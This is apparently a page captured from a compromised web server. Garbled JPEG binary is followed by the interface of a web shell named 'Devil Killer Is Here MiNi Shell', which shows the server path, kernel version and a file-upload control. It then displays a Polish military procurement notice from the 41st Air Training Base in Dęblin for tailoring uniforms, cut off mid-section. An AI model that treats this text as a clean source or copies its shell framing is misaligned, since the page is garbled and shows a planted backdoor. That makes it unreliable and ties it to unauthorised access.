JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210916/0018284101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi szycia na miarę umundurowania wyjściowego i galowego <br/>dla żołnierzy zawodowych i kandydatów na żołnierzy zawodowych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">41. Baza Lotnictwa Szkolnego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 061456920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brygady Pościgowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dęblin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-521</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261-517-818</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">41blsz.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.41blsz.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi szycia na miarę umundurowania wyjściowego i galowego <br/>dla żołnierzy zawodowych i kandydatów na żołnierzy zawodowych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-13590955-16d5-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00182841</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010869/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Szycie umundurowania</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/41blsz/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone przy<br/>użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej pod adresem:<br/>https://platformazakupowa.pl/pn/41blsz/proceedings2. Zamawiający dopuszcza również możliwość<br/>składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń za pomocą poczty elektronicznej, na adres e-mail: 41blsz.przetargi@ron.mil.pl , z<br/>zastrzeżeniem, że oferta musi wpłynąć na Platformę Zakupową Zamawiającego, a nie na wskazaną<br/>pocztę elektroniczną!3. Jeżeli Zamawiający zdecyduje się na przeprowadzenie negocjacji - będą one<br/>prowadzone elektronicznie za pośrednictwem platformy zakupowej: https://platformazakupowa.pl<br/>poprzez wzajemną wymianę wiadomości między Zamawiającym a Wykonawcą. Po zakończeniu<br/>negocjacji Zamawiający sporządzi protokół z negocjacji, którego treść będzie zaakceptowana przez<br/>Wykonawcę również za pośrednictwem platformy zakupowej<br/>https://platformazakupowa.pl/pn/41blsz/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia<br/>publicznego lub konkursie (Dz. U. z 2020 poz. 2452) - określa niezbędne wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>Ogłoszenie nr 2021/BZP 00063186/01 z dnia 2021-05-25<br/>2021-05-25 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w<br/>trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Dostawy<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux,<br/>lub ich nowsze wersje;<br/>c) zainstalowana dowolna przeglądarka internetowa; w przypadku Internet Explorer minimalnie wersja10.0.;<br/>d) włączona obsługa JavaScript;<br/>e) zainstalowany program Adobe Acrobat Reader, lub inny obsługujący format plików .pdf.;<br/>f) platforma działa według standardu przyjętego w komunikacji<br/>sieciowej - kodowanie UTF8;<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi<br/>datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z<br/>zegarem Głównego Urzędu Miar2. Szczegółowo informacje zawarte są w Rozdziale 10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: - administratorem Pani/Pana danych osobowych<br/>jest:41. Baza Lotnictwa Szkolnego w Dęblinieul. Brygady Pościgowej 508 – 521 Dęblin,NIP:506-011-<br/>18-75, REGON: 061456920kontakt: tel. 261 517 525 e-mail: 41blsz.przetargi@ron.mil.plPani/Pana<br/>dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego: przeprowadzonego w trybie podstawowym z<br/>możliwością negocjacji tj: dotyczącego „Zakup materiałów i urządzeń biurowych osprzętu mechanizacji<br/>prac biurowych na rzecz 41.Bazy Lotnictwa Szkolnego w Dęblinie, Nr 3/21/P”.Odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu ustawę z dnia 11 września 2019 roku – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019. ), dalej „ustawa Pzp”; 􀀁􀀁􀀁􀀁􀀁􀀁􀀁􀀁<br/>Pani/Pana<br/>dane<br/>osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy;􀀁􀀁􀀁􀀁􀀁􀀁􀀁􀀁 obowiązek podania<br/>przez<br/>Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 􀀁􀀁􀀁􀀁􀀁􀀁􀀁􀀁 w<br/>odniesieniu do<br/>Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;􀀁􀀁􀀁􀀁􀀁􀀁􀀁􀀁 posiada Pani/Pan:− na podstawie art. 15 RODO prawo dostępu do danych<br/>osobowych<br/>Pani/Pana dotyczących;− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych *;− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>**; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;􀀁􀀁􀀁􀀁􀀁􀀁􀀁􀀁 nie<br/>przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na<br/>Ogłoszenie nr 2021/BZP 00173521/01 z dnia 2021-09-08<br/>2021-09-08 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO*Wyjaśnienie:<br/>skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz<br/>nie może naruszać integralności protokołu oraz jego załączników.***Wyjaśnienie: prawo do<br/>Ogłoszenie nr 2021/BZP 00063186/01 z dnia 2021-05-25<br/>Ogłoszenie nr 2021/BZP 00084395/01 z dnia 2021-06-16<br/>2021-06-16 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w<br/>trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Dostawy<br/>2021-05-25 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w<br/>trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Dostawy<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">przypadku korzystania przez osobę, której dane<br/>osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3<br/>RODO (związanych z prawem wykonawcy do uzyskania od administratora potwierdzenia, czy<br/>przetwarzane są dane osobowe jego dotyczące, prawem wykonawcy do bycia poinformowanym o<br/>odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego<br/>danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania<br/>przez wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu),<br/>zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia.- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa<br/>w art. 16 RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może<br/>naruszać integralności protokołu postępowania oraz jego załączników.- W postępowaniu o udzielenie<br/>zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO,<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.- W<br/>przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust.<br/>2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">20/21/P</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. ZADANIE I – przedmiotem zamówienia jest świadczenie usługi szycia na miarę koszul dla żołnierzy zawodowych i kandydatów na żołnierzy zawodowych.<br/>2. Szczegółowy opis przedmiotu zamówienia określa SWZ oraz:<br/>a)	Załącznik Nr 1 do SWZ tj. formularz ofertowy;<br/>b)	Załącznik Nr 1a do SWZ tj. szczegółowy opis przedmiotu zamówienia zawarty <br/>w Wojskowej Dokumentacji Techniczno-Technologicznej (WDTT);<br/>c)	Załącznik Nr 1b do SWZ tj. wykaz przedmiotu zamówienia w danym zadaniu wraz terminami dostaw i ilościami mundurów w danym terminie;<br/>d)	Załącznik Nr 4 do SWZ – ogólne warunki umowy.<br/>3. Umundurowanie zostanie uszyte według określonych wzorów, zgodnie z obowiązującą w 2021 r. Wojskową Dokumentacją Techniczno-Technologiczną (WDTT).<br/>4.	Każdy z dostarczonych przedmiotów umundurowania oznakowany będzie kodem kreskowym zgodnie z Decyzją nr 2/MON z dnia 3 stycznia 2014 roku w sprawie wytycznych określających wymagania w zakresie znakowania kodem kreskowym wyrobów dostarczanych do resortu obrony narodowej.<br/>5.	Szycie umundurowania będzie realizowane w siedzibie Wykonawcy, natomiast wszelkie czynności wstępne, takie jak pomiary antropometryczne oraz przymiarki nastąpią na koszt Wykonawcy na terenie 41.Bazy Lotnictwa Szkolnego w Dęblinie. Wykonawca przed przystąpieniem do szycia umundurowania zobowiązany jest do pobrania wymiarów antropometrycznych od żołnierzy, na podstawie których uszyje umundurowanie.<br/>6.	Szczegółowe terminy pobrania wymiarów antropometrycznych zostaną określone w kontaktach roboczych, w drodze pisemnej lub telefonicznej, pomiędzy przedstawicielem Zamawiającego - Szefem Służby Mundurowej 41.Bazy Lotnictwa Szkolnego w Dęblinie a przedstawicielem Wykonawcy, co najmniej na 2 dni (dwa dni) przed planowanym dniem pobrania wymiarów i przymiarek.<br/>7.	Wykonawca musi posiadać zatwierdzony przez Wojskowy Ośrodek Badawczo-Wdrożeniowy Służby Mundurowej w Łodzi - wzór przedmiotu umowy, zgodny z Wojskową Dokumentacją Techniczno-Technologiczną do produkcji seryjnej. <br/>8.	Przedmioty Umowy muszą zostać zgłoszone przez WYKONAWCĘ do odbioru wojskowego. <br/>9.	System zarządzania jakością WYKONAWCY spełnia wymagania zawarte w AQAP 2110 wydanie D wersja 1 – Klauzula Jakościowa stanowi załącznik nr 6 do SWZ oraz załącznik nr 3 do umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98393000-4 - Usługi krawieckie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	ZADANIE I: <br/>Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryteriami i ich znaczeniem (wagą):<br/><br/>X - cena brutto oferty – waga 100%<br/><br/>X = (Cn : Cb) x 100 x 100% (ilość punktów)<br/><br/>gdzie<br/><br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert<br/>Cb – cena brutto oferty ocenianej<br/><br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto - z formularza ofertowego stanowiącego załącznik Nr 1 do SWZ – kolumna 9. Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz. U. z 2019 r. poz. 178). Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą.<br/><br/>Maksymalna liczba punktów, jaką Wykonawca może uzyskać w kryterium „cena brutto oferty” wynosi 100 punktów.<br/><br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie wskazanego powyżej kryterium. <br/><br/>Zamawiający zastosuje zaokrąglenie wyników do dwóch miejsc po przecinku, zgodnie <br/>z matematycznymi zasadami zaokrąglania. <br/><br/>Jako najkorzystniejsza zostanie wybrana oferta, która otrzyma największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. ZADANIE II – przedmiotem zamówienia jest świadczenie usługi szycia na miarę płaszczy dla żołnierzy zawodowych i kandydatów na żołnierzy zawodowych.<br/>2. Szczegółowy opis przedmiotu zamówienia określa niniejsza SWZ oraz:<br/>a)	Załącznik Nr 1 do SWZ tj. formularz ofertowy;<br/>b)	Załącznik Nr 1a do SWZ tj. szczegółowy opis przedmiotu zamówienia zawarty <br/>w Wojskowej Dokumentacji Techniczno-Technologicznej (WDTT);<br/>c)	Załącznik Nr 1b do SWZ tj. wykaz przedmiotu zamówienia w danym zadaniu wraz terminami dostaw i ilościami mundurów w danym terminie;<br/>d)	Załącznik Nr 4 do SWZ – ogólne warunki umowy.<br/>3. Umundurowanie zostanie uszyte według określonych wzorów, zgodnie z obowiązującą w 2021 r. Wojskową Dokumentacją Techniczno-Technologiczną (WDTT).<br/>4.	Każdy z dostarczonych przedmiotów umundurowania oznakowany będzie kodem kreskowym zgodnie z Decyzją nr 2/MON z dnia 3 stycznia 2014 roku w sprawie wytycznych określających wymagania w zakresie znakowania kodem kreskowym wyrobów dostarczanych do resortu obrony narodowej.<br/>5.	Szycie umundurowania będzie realizowane w siedzibie Wykonawcy, natomiast wszelkie czynności wstępne, takie jak pomiary antropometryczne oraz przymiarki nastąpią na koszt Wykonawcy na terenie 41.Bazy Lotnictwa Szkolnego w Dęblinie. Wykonawca przed przystąpieniem do szycia umundurowania zobowiązany jest do pobrania wymiarów antropometrycznych od żołnierzy, na podstawie których uszyje umundurowanie.<br/>6.	Szczegółowe terminy pobrania wymiarów antropometrycznych zostaną określone w kontaktach roboczych, w drodze pisemnej lub telefonicznej, pomiędzy przedstawicielem Zamawiającego - Szefem Służby Mundurowej 41.Bazy Lotnictwa Szkolnego w Dęblinie <br/>a przedstawicielem Wykonawcy, co najmniej na 2 dni (dwa dni) przed planowanym dniem pobrania wymiarów i przymiarek.<br/>7.	Wykonawca musi posiadać zatwierdzony przez Wojskowy Ośrodek Badawczo-Wdrożeniowy Służby Mundurowej w Łodzi - wzór przedmiotu umowy, zgodny z Wojskową Dokumentacją Techniczno-Technologiczną do produkcji seryjnej. <br/>8.	Przedmioty Umowy muszą zostać zgłoszone przez WYKONAWCĘ do odbioru wojskowego. <br/>9.	System zarządzania jakością WYKONAWCY spełnia wymagania zawarte w AQAP 2110 wydanie D wersja 1 – Klauzula Jakościowa stanowi załącznik nr 6 do SWZ oraz załącznik nr 3 do umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98393000-4 - Usługi krawieckie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) 